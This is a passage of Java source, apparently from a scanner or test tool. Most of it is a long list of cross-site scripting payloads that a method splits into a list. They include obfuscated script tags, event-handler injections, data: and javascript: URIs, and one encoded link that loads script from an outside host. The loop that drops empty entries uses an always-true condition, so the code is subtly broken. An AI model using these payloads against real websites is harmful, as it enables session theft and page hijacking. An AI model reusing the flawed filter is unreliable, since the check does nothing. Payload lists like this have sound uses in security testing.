                + "<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>\n"
                + "<div style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"alert(1)\">x</button>\n"
                + "\"><img src=x onerror=window.open('https://www.google.com/');>\n"
                + "<form><button formaction=javascript&colon;alert(1)>CLICKME\n"
                + "<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n"
                + "<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\n"
                + "<iframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>\n"
                + "<a href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click Me</a>\n"
                + "<script\\x20type=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x09type=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "'`\"><\\x3Cscript>javascript:alert(1)</script>        \n"
                + "'`\"><\\x00script>javascript:alert(1)</script>\n"
                + "<img src=1 href=1 onerror=\"javascript:alert(1)\"></img>\n"
                + "<audio src=1 href=1 onerror=\"javascript:alert(1)\"></audio>\n"
                + "<video src=1 href=1 onerror=\"javascript:alert(1)\"></video>\n"
                + "<body src=1 href=1 onerror=\"javascript:alert(1)\"></body>\n"
                + "<image src=1 href=1 onerror=\"javascript:alert(1)\"></image>\n"
                + "<object src=1 href=1 onerror=\"javascript:alert(1)\"></object>\n"
                + "<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>\n"
                + "<svg onResize svg onResize=\"javascript:javascript:alert(1)\"></svg onResize>\n"
                + "<title onPropertyChange title onPropertyChange=\"javascript:javascript:alert(1)\"></title onPropertyChange>\n"
                + "<iframe onLoad iframe onLoad=\"javascript:javascript:alert(1)\"></iframe onLoad>\n"
                + "<body onMouseEnter body onMouseEnter=\"javascript:javascript:alert(1)\"></body onMouseEnter>\n"
                + "<body onFocus body onFocus=\"javascript:javascript:alert(1)\"></body onFocus>\n"
                + "<frameset onScroll frameset onScroll=\"javascript:javascript:alert(1)\"></frameset onScroll>\n"
                + "<script onReadyStateChange script onReadyStateChange=\"javascript:javascript:alert(1)\"></script onReadyStateChange>\n"
                + "<html onMouseUp html onMouseUp=\"javascript:javascript:alert(1)\"></html onMouseUp>\n"
                + "<body onPropertyChange body onPropertyChange=\"javascript:javascript:alert(1)\"></body onPropertyChange>\n"
                + "<svg onLoad svg onLoad=\"javascript:javascript:alert(1)\"></svg onLoad>\n"
                + "<body onPageHide body onPageHide=\"javascript:javascript:alert(1)\"></body onPageHide>\n"
                + "<body onMouseOver body onMouseOver=\"javascript:javascript:alert(1)\"></body onMouseOver>\n"
                + "<body onUnload body onUnload=\"javascript:javascript:alert(1)\"></body onUnload>\n"
                + "<body onLoad body onLoad=\"javascript:javascript:alert(1)\"></body onLoad>\n"
                + "<bgsound onPropertyChange bgsound onPropertyChange=\"javascript:javascript:alert(1)\"></bgsound onPropertyChange>\n"
                + "<html onMouseLeave html onMouseLeave=\"javascript:javascript:alert(1)\"></html onMouseLeave>\n"
                + "<html onMouseWheel html onMouseWheel=\"javascript:javascript:alert(1)\"></html onMouseWheel>\n"
                + "<style onLoad style onLoad=\"javascript:javascript:alert(1)\"></style onLoad>\n"
                + "<iframe onReadyStateChange iframe onReadyStateChange=\"javascript:javascript:alert(1)\"></iframe onReadyStateChange>\n"
                + "<body onPageShow body onPageShow=\"javascript:javascript:alert(1)\"></body onPageShow>\n"
                + "<style onReadyStateChange style onReadyStateChange=\"javascript:javascript:alert(1)\"></style onReadyStateChange>\n"
                + "<frameset onFocus frameset onFocus=\"javascript:javascript:alert(1)\"></frameset onFocus>\n"
                + "<applet onError applet onError=\"javascript:javascript:alert(1)\"></applet onError>\n"
                + "<marquee onStart marquee onStart=\"javascript:javascript:alert(1)\"></marquee onStart>\n"
                + "<script onLoad script onLoad=\"javascript:javascript:alert(1)\"></script onLoad>\n"
                + "<html onMouseOver html onMouseOver=\"javascript:javascript:alert(1)\"></html onMouseOver>\n"
                + "<html onMouseEnter html onMouseEnter=\"javascript:parent.javascript:alert(1)\"></html onMouseEnter>\n"
                + "<body onBeforeUnload body onBeforeUnload=\"javascript:javascript:alert(1)\"></body onBeforeUnload>\n"
                + "<html onMouseDown html onMouseDown=\"javascript:javascript:alert(1)\"></html onMouseDown>\n"
                + "<marquee onScroll marquee onScroll=\"javascript:javascript:alert(1)\"></marquee onScroll>\n"
                + "<xml onPropertyChange xml onPropertyChange=\"javascript:javascript:alert(1)\"></xml onPropertyChange>\n"
                + "<frameset onBlur frameset onBlur=\"javascript:javascript:alert(1)\"></frameset onBlur>\n"
                + "<applet onReadyStateChange applet onReadyStateChange=\"javascript:javascript:alert(1)\"></applet onReadyStateChange>\n"
                + "<svg onUnload svg onUnload=\"javascript:javascript:alert(1)\"></svg onUnload>\n"
                + "<html onMouseOut html onMouseOut=\"javascript:javascript:alert(1)\"></html onMouseOut>\n"
                + "<body onMouseMove body onMouseMove=\"javascript:javascript:alert(1)\"></body onMouseMove>\n"
                + "<body onResize body onResize=\"javascript:javascript:alert(1)\"></body onResize>\n"
                + "<object onError object onError=\"javascript:javascript:alert(1)\"></object onError>\n"
                + "<body onPopState body onPopState=\"javascript:javascript:alert(1)\"></body onPopState>\n"
                + "<html onMouseMove html onMouseMove=\"javascript:javascript:alert(1)\"></html onMouseMove>\n"
                + "<applet onreadystatechange applet onreadystatechange=\"javascript:javascript:alert(1)\"></applet onreadystatechange>\n"
                + "<body onpagehide body onpagehide=\"javascript:javascript:alert(1)\"></body onpagehide>\n"
                + "<svg onunload svg onunload=\"javascript:javascript:alert(1)\"></svg onunload>\n"
                + "<applet onerror applet onerror=\"javascript:javascript:alert(1)\"></applet onerror>\n"
                + "<body onkeyup body onkeyup=\"javascript:javascript:alert(1)\"></body onkeyup>\n"
                + "<body onunload body onunload=\"javascript:javascript:alert(1)\"></body onunload>\n"
                + "<iframe onload iframe onload=\"javascript:javascript:alert(1)\"></iframe onload>\n"
                + "<body onload body onload=\"javascript:javascript:alert(1)\"></body onload>\n"
                + "<html onmouseover html onmouseover=\"javascript:javascript:alert(1)\"></html onmouseover>\n"
                + "<object onbeforeload object onbeforeload=\"javascript:javascript:alert(1)\"></object onbeforeload>\n"
                + "<body onbeforeunload body onbeforeunload=\"javascript:javascript:alert(1)\"></body onbeforeunload>\n"
                + "<body onfocus body onfocus=\"javascript:javascript:alert(1)\"></body onfocus>\n"
                + "<body onkeydown body onkeydown=\"javascript:javascript:alert(1)\"></body onkeydown>\n"
                + "<iframe onbeforeload iframe onbeforeload=\"javascript:javascript:alert(1)\"></iframe onbeforeload>\n"
                + "<iframe src iframe src=\"javascript:javascript:alert(1)\"></iframe src>\n"
                + "<svg onload svg onload=\"javascript:javascript:alert(1)\"></svg onload>\n"
                + "<html onmousemove html onmousemove=\"javascript:javascript:alert(1)\"></html onmousemove>\n"
                + "<body onblur body onblur=\"javascript:javascript:alert(1)\"></body onblur>\n"
                + "\\x3Cscript>javascript:alert(1)</script>\n"
                + "'\"`><script>/* *\\x2Fjavascript:alert(1)// */</script>\n"
                + "<script>javascript:alert(1)</script\\x0D\n"
                + "<script>javascript:alert(1)</script\\x0A";

        for (String x : payload.split("\n")) {
            if (x != null || !x.equals("")) {
                list.add(x);
            }
        }
        return list;
    }
}
